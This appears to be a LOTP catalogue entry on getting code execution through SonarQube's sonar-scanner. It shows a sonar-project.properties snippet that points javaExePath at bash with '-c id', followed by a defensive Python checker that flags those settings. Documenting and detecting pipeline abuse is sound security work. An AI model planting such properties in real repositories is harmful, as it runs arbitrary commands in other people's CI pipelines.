LOTP
SonarQube Scanner
sonar-scanner is a scanner that uses an external SonarQube server to evaluate code security. It is configured via a config file named sonar-project.properties. RCE can be achieved through sonar.scanner.javaExePath, which sets the executable the scanner launches in place of a JRE, combined with sonar.scanner.javaOpts, which supplies that executable's arguments:
sonar.projectKey=ABC
sonar.scanner.javaExePath=/usr/bin/bash
sonar.scanner.skipJreProvisioning=true
sonar.scanner.javaOpts=-c id
Note: the sonarsource/sonarqube-scan-action GitHub Action changes directory to /home/runner/work/_temp/sonarscanner.
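As an added example (not part of the LOTP page or of SonarSource's tooling), a small Python checker a pipeline owner can run over sonar-project.properties before the scan step: it parses the Java properties format and flags the three settings shown above, including the case where javaExePath points at a shell or interpreter rather than a JRE. The sample file content is constructed to mirror the pattern above.

```python
# Flag sonar-project.properties settings that let sonar-scanner run an arbitrary executable (added example, not LOTP's code).
import re

# Keys that change *what* sonar-scanner executes, and *with what arguments*.
RISKY_KEYS = {
    "sonar.scanner.javaExePath": "overrides the executable run as 'java'",
    "sonar.scanner.javaOpts": "arguments handed to that executable",
    "sonar.scanner.skipJreProvisioning": "forces use of javaExePath instead of a provisioned JRE",
}
# Executables a scan should never be pointed at (shells and scripting interpreters).
SHELLS = re.compile(r"(^|/)(ba|z|da|k|)sh$|(^|/)(python[0-9.]*|perl|node)$")


def parse_properties(text: str) -> dict:
    """Tiny Java .properties reader: comments, '=' or ':' separators, '\\' continuations."""
    props, pending = {}, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line[0] in "#!":
            continue
        if line.endswith("\\") and not line.endswith("\\\\"):
            pending = line[:-1]   # value continues on the next line
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2)   # later definitions win, as in Java
    return props


def audit(text: str) -> list:
    """Return (key, value, reason) findings for a properties file's content."""
    props = parse_properties(text)
    findings = []
    for key, why in RISKY_KEYS.items():
        if key in props:
            findings.append((key, props[key], why))
    exe = props.get("sonar.scanner.javaExePath", "")
    if exe and SHELLS.search(exe):
        findings.append(("sonar.scanner.javaExePath", exe, "is a shell or interpreter, not a JRE"))
    return findings


# Constructed sample mirroring the abuse pattern described above.
SAMPLE = """sonar.projectKey=ABC
sonar.scanner.javaExePath=/usr/bin/bash
sonar.scanner.skipJreProvisioning=true
sonar.scanner.javaOpts=-c id
"""
if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("%s = %r: %s" % finding)
```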